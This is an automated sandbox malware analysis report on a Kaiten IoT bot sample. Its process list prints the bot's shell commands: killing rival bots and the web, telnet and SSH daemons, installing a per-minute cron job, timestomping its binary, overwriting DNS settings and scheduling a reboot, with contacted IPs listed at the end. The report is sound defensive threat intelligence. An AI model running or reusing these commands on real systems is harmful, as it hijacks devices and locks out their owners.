Malware Analysis Report

2024-11-13 17:34

Sample ID 220415-bg3e3sagd9
Target 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
SHA256 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Tags
kaiten persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848

Threat Level: Known bad

The file 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 was found to be: Known bad.

Malicious Activity Summary

kaiten persistence

Kaiten family

Identified Kaiten Bot

Writes file to system bin folder

Writes DNS configuration

Modifies init.d

Write file to user bin folder

Modifies rc script

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-15 01:07

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-15 01:07

Reported

2022-04-15 01:39

Platform

debian9-mipsel-en-20211208

Max time kernel

0s

Max time network

120s

Command Line

[./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

Signatures

Writes DNS configuration

Description Indicator Process Target
/etc/resolv.conf /etc/resolv.conf N/A N/A

Modifies init.d

persistence
Description Indicator Process Target
/etc/init.d/rcS /etc/init.d/rcS ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.d/rc.local /etc/rc.d/rc.local ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A

Write file to user bin folder

Description Indicator Process Target
/usr/sbin/nvram /usr/sbin/nvram ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/bin/compile_time /usr/bin/compile_time ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/bin/crontab /usr/bin/crontab ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/usr/sbin/service /usr/sbin/service /usr/sbin/service N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
/sys/fs/kdbus/0-system/bus /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/systemctl N/A
/proc/1/environ /proc/1/environ /bin/systemctl N/A
/proc/self/stat /proc/self/stat /bin/systemctl N/A
/proc/cmdline /proc/cmdline /bin/systemctl N/A
/proc/321/cmdline /proc/321/cmdline ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/proc/filesystems /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/tty3 /tmp/tty3 /bin/rm N/A
/tmp/tty4 /tmp/tty4 /bin/rm N/A
/tmp/tty6 /tmp/tty6 /bin/rm N/A
/tmp/.xs /tmp/.xs N/A N/A
/tmp/.xs/*.pid /tmp/.xs/*.pid /bin/cat N/A
/tmp/toexec /tmp/toexec ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 N/A
/tmp/tty1 /tmp/tty1 /bin/rm N/A
/tmp/tty2 /tmp/tty2 /bin/rm N/A
/tmp/tty5 /tmp/tty5 /bin/rm N/A
/tmp/.xs/* /tmp/.xs/* /bin/rm N/A

Processes

./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848

[./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/sh

[sh -c rm -rf /var/run/wgsh > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/wgsh]

/bin/sh

[sh -c rm -rf /var/run/bbsh > /dev/null 2>&1 &]

/bin/sh

[sh -c rm -rf /var/run/tty1 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/bbsh]

/bin/sh

[sh -c rm -rf /var/run/tty2 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty1]

/bin/sh

[sh -c rm -rf /var/run/tty3 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty2]

/bin/sh

[sh -c rm -rf /var/run/tty4 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty3]

/bin/sh

[sh -c rm -rf /var/run/tty5 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty4]

/bin/sh

[sh -c rm -rf /var/run/tty6 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty5]

/bin/sh

[sh -c rm -rf /tmp/tty1 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/tty6]

/bin/sh

[sh -c rm -rf /tmp/tty2 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty1]

/bin/sh

[sh -c rm -rf /tmp/tty3 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty2]

/bin/sh

[sh -c rm -rf /tmp/tty4 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty3]

/bin/sh

[sh -c rm -rf /tmp/tty5 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty4]

/bin/sh

[sh -c rm -rf /tmp/tty6 > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty5]

/bin/sh

[sh -c rm -rf /var/run/pty > /dev/null 2>&1 &]

/bin/rm

[rm -rf /tmp/tty6]

/bin/sh

[sh -c killall -9 arm > /dev/null 2>&1 &]

/bin/rm

[rm -rf /var/run/pty]

/bin/sh

[sh -c killall -9 mips > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 mipsel > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 powerpc > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 ppc > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.armv4l.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.i686.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.mips.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c killall -9 daemon.mipsel.mod > /dev/null 2>&1 &]

/bin/sh

[sh -c kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c rm -rf /tmp/.xs/* > /dev/null 2>&1 &]

/bin/cat

[cat /tmp/.xs/*.pid]

/bin/sh

[sh -c sleep 432000 && reboot &]

/bin/rm

[rm -rf /tmp/.xs/*]

/bin/sh

[sh -c echo "nameserver 8.8.8.8" > /etc/resolv.conf &]

/bin/sleep

[sleep 432000]

/bin/sh

[sh -c chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &]

/bin/sh

[sh -c touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/chmod

[chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/bin/sh

[sh -c (crontab -l | grep -v "/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848" | grep -v "no cron" | grep -v "lesshts/run.sh" > /var/run/.x001804289383) > /dev/null 2>&1]

/bin/grep

[grep -v no cron]

/bin/grep

[grep -v /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v lesshts/run.sh]

/bin/sh

[sh -c echo "* * * * * /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &" >> /var/run/.x001804289383]

/bin/sh

[sh -c crontab /var/run/.x001804289383]

/usr/bin/crontab

[crontab /var/run/.x001804289383]

/bin/sh

[sh -c rm -rf /var/run/.x001804289383]

/bin/rm

[rm -rf /var/run/.x001804289383]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c /bin/uname -n]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &]

/bin/sh

[sh -c service httpd stop > /dev/null 2>&1 &]

/bin/cat

[cat /var/run/httpd.pid]

/bin/sh

[sh -c killall -9 mini_httpd > /dev/null 2>&1 &]

/usr/sbin/service

[service httpd stop]

/bin/sh

[sh -c killall -9 minihttpd > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c nvram set httpd_enable=0 > /dev/null 2>&1]

/bin/cat

[cat /var/run/thttpd.pid]

/bin/sh

[sh -c nvram set http_enable=0 > /dev/null 2>&1]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 httpd > /dev/null 2>&1 &]

/bin/sh

[sh -c service telnetd stop > /dev/null 2>&1 &]

/bin/sh

[sh -c service sshd stop > /dev/null 2>&1 &]

/usr/sbin/service

[service telnetd stop]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sh

[sh -c killall -9 telnetd > /dev/null 2>&1 &]

/usr/sbin/service

[service sshd stop]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 utelnetd > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sh

[sh -c killall -9 dropbear > /dev/null 2>&1 &]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 sshd > /dev/null 2>&1 &]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sh

[sh -c killall -9 lighttpd > /dev/null 2>&1 &]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl stop httpd.service]

/usr/local/bin/systemctl

[systemctl stop httpd.service]

/usr/sbin/systemctl

[systemctl stop httpd.service]

/usr/bin/systemctl

[systemctl stop httpd.service]

/sbin/systemctl

[systemctl stop httpd.service]

/bin/systemctl

[systemctl stop httpd.service]

/usr/local/sbin/systemctl

[systemctl stop telnetd.service]

/usr/local/bin/systemctl

[systemctl stop telnetd.service]

/usr/sbin/systemctl

[systemctl stop telnetd.service]

/usr/bin/systemctl

[systemctl stop telnetd.service]

/sbin/systemctl

[systemctl stop telnetd.service]

/bin/systemctl

[systemctl stop telnetd.service]

/usr/local/sbin/systemctl

[systemctl stop sshd.service]

/usr/local/bin/systemctl

[systemctl stop sshd.service]

/usr/sbin/systemctl

[systemctl stop sshd.service]

/usr/bin/systemctl

[systemctl stop sshd.service]

/sbin/systemctl

[systemctl stop sshd.service]

/bin/systemctl

[systemctl stop sshd.service]

Network

Country Destination Domain Proto
PE 191.98.172.42:8080 tcp
CN 211.103.199.94:8080 tcp
TH 202.28.32.30:8080 tcp
ID 103.3.46.2:8080 tcp
RU 195.70.197.29:8080 tcp

Files

N/A